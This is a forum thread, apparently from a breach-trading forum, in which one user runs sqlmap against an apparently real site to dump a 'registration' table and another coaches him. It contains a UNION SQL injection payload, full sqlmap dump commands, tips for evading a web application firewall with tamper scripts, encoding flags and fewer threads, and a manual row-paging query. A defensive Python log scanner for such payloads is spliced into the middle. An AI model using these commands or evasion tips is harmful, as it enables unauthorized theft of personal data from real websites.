SQL injection related question
Almost 7 hrs, still waiting for the dump but no sign!
 

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 32 columns
    Payload: id=4308' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(75)+CHAR(68)+CHAR(73)+CHAR(67)+CHAR(98)+CHAR(117)+CHAR(103)+CHAR(120)+CHAR(68)+CHAR(109)+CHAR(69)+CHAR(68)+CHAR(117)+CHAR(121)+CHAR(107)+CHAR(70)+CHAR(121)+CHAR(76)+CHAR(88)+CHAR(66)+CHAR(70)+CHAR(78)+CHAR(122)+CHAR(83)+CHAR(89)+CHAR(68)+CHAR(83)+CHAR(110)+CHAR(115)+CHAR(105)+CHAR(86)+CHAR(122)+CHAR(106)+CHAR(85)+CHAR(87)+CHAR(82)+CHAR(68)+CHAR(101)+CHAR(72)+CHAR(72)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FrFu
---
[12:30:09] [INFO] testing Microsoft SQL Server
[12:30:09] [INFO] confirming Microsoft SQL Server
[12:30:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2017
[12:30:09] [INFO] fetching columns for table 'registration' in database 'aaaaa_demo_live'
[12:30:09] [INFO] fetching entries for table 'registration' in database 'aaaaa_demo_live'
[12:30:17] [INFO] starting 10 threads
Reply
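Seen from the server side, the UNION payload in the log above has a recognisable shape in request logs: `UNION ALL SELECT` padded with NULL columns around one `CHAR(n)+CHAR(n)+...` chain. The following is an added example, not part of the original thread; the log lines, paths and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request-log lines (not from any real server).
SAMPLE_LOG = [
    "GET /item.aspx id=4308 200",
    "GET /item.aspx id=4308'+UNION+ALL+SELECT+NULL,NULL,"
    "CHAR(113)%2BCHAR(118)%2BCHAR(98)%2BCHAR(98)%2BCHAR(113)%2BCHAR(75)"
    "%2BCHAR(113)%2BCHAR(113)%2BCHAR(122)%2BCHAR(122)%2BCHAR(113),NULL--+FrFu 200",
    "GET /search.aspx q=union+station+opening+hours 200",
]

UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)
NULL_RE = re.compile(r"\bNULL\b", re.I)
CHAR_RE = re.compile(r"CHAR\((\d{1,3})\)", re.I)
# Four or more CHAR(n) terms joined with '+' (T-SQL string concatenation).
CHAIN_RE = re.compile(r"CHAR\(\d{1,3}\)(?:\s*\+\s*CHAR\(\d{1,3}\)){3,}", re.I)


def decode_char_chain(chain):
    """Turn 'CHAR(113)+CHAR(118)+...' back into the string it builds."""
    return "".join(chr(int(n)) for n in CHAR_RE.findall(chain))


def inspect(line):
    """Return details if the line looks like a NULL-padded UNION probe."""
    text = unquote_plus(line)  # '+' becomes space, '%2B' becomes '+'
    if not UNION_RE.search(text):
        return None
    null_columns = len(NULL_RE.findall(text))
    chain = CHAIN_RE.search(text)
    marker = decode_char_chain(chain.group(0)) if chain else None
    if null_columns < 2 and marker is None:
        return None  # a bare "union select" in text is not enough
    return {"null_columns": null_columns, "marker": marker}


def scan(lines):
    """Return (line_number, details) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        details = inspect(line)
        if details:
            hits.append((number, details))
    return hits


if __name__ == "__main__":
    for number, details in scan(SAMPLE_LOG):
        print(number, details)
```

Log matching only shows that the parameter is being probed; the fix for the injection itself is a parameterized query on `id`.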
1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections?
Reply
(August 15, 2022, 01:39 PM)TheGoodlife Wrote: 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections?


^ all I wanted to say
systemctl start breached

Reply
(August 15, 2022, 01:39 PM)TheGoodlife Wrote: 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections?


1. Okay
2. yes
3. no
4. no
5. no

python sqlmap.py -u "https://....aspx?id=82" -D aaaaa_demo_live -T registration --dump --output-dir=lol --dbms="Microsoft SQL Server" --random-agent --threads 10 --technique=U --batch
Reply
(August 15, 2022, 01:43 PM)arishsingh07 Wrote:
(August 15, 2022, 01:39 PM)TheGoodlife Wrote: 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections?


1. Okay
2. yes
3. no
4. no
5. no



python sqlmap.py -u "https://....aspx?id=82" -D aaaaa_demo_live -T registration --dump --output-dir=lol --dbms="Microsoft SQL Server" --random-agent --threads 10 --technique=U --batch


Why are you forcing a Union injection? Maybe other methods succeed instead. Turn off that --batch flag, you will need to manually adjust. Use --random-agent --threads=2 (or maximum 3) --hex

and if that doesn't work, try using --tamper=between
Reply
(August 15, 2022, 01:48 PM)TheGoodlife Wrote:
(August 15, 2022, 01:43 PM)arishsingh07 Wrote:
(August 15, 2022, 01:39 PM)TheGoodlife Wrote: 1. Lower the number of threads.
2. Did you use --random-agent?
3. Did you use a tamper script?
4. Did you try --hex or --no-cast?
5. Did you manually check if the WAF is dropping connections?


1. Okay
2. yes
3. no
4. no
5. no



python sqlmap.py -u "https://....aspx?id=82" -D aaaaa_demo_live -T registration --dump --output-dir=lol --dbms="Microsoft SQL Server" --random-agent --threads 10 --technique=U --batch


Why are you forcing a Union injection? Maybe other methods succeed instead. Turn off that --batch flag, you will need to manually adjust. Use --random-agent --threads=2 (or maximum 3) --hex

and if that doesn't work, try using --tamper=between


Thanks, Okay let me try again


[CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:

I have to use tamper now
Reply
I found that I cant dump the reg table, now without tamper and hex by selecting the column dump.. Not satisfied toh but is somewhat working @TheGoodlife [Thanks for your help] Thank you to @Vapospice
Reply
(August 15, 2022, 02:35 PM)arishsingh07 Wrote: I found that I cant dump the reg table, now without tamper and hex by selecting the column dump.. Not satisfied toh but is somewhat working @TheGoodlife [Thanks for your help] Thank you to @Vapospice


try --no-cast instead of hex

You need to play around with it. If you open the tamper folder in your SQLMap folder, you can open the tamper scripts and read what they do in the first few lines. Maybe one fits exactly your needs
Reply
(August 15, 2022, 02:37 PM)TheGoodlife Wrote:
(August 15, 2022, 02:35 PM)arishsingh07 Wrote: I found that I cant dump the reg table, now without tamper and hex by selecting the column dump.. Not satisfied toh but is somewhat working @TheGoodlife [Thanks for your help] Thank you to @Vapospice


try --no-cast instead of hex

You need to play around with it. If you open the tamper folder in your SQLMap folder, you can open the tamper scripts and read what they do in the first few lines. Maybe one fits exactly your needs

Got it.. Thanks for your suggestion.


Would you like to help me with this problem also?
@TheGoodlife
[how to add limits using where]
with a url example like https://example.com....?id=82 [how to add limits]
https://breached.to/Thread-sqlmap-dump-tables-with-more-than-one-million-how
Reply
(August 15, 2022, 02:41 PM)arishsingh07 Wrote:
(August 15, 2022, 02:37 PM)TheGoodlife Wrote:
(August 15, 2022, 02:35 PM)arishsingh07 Wrote: I found that I cant dump the reg table, now without tamper and hex by selecting the column dump.. Not satisfied toh but is somewhat working @TheGoodlife [Thanks for your help] Thank you to @Vapospice


try --no-cast instead of hex

You need to play around with it. If you open the tamper folder in your SQLMap folder, you can open the tamper scripts and read what they do in the first few lines. Maybe one fits exactly your needs

Got it.. Thanks for your suggestion.


Would you like to help me with this problem also?
@TheGoodlife
[how to add limits using where]
with a url example like https://example.com....?id=82 [how to add limits]
https://breached.to/Thread-sqlmap-dump-tables-with-more-than-one-million-how


That is quite complicated without knowing the backend. You could try manual SQL:

--sql-query="use db; SELECT * FROM table OFFSET 5000 ROWS FETCH NEXT 4000 ROWS ONLY;"
Reply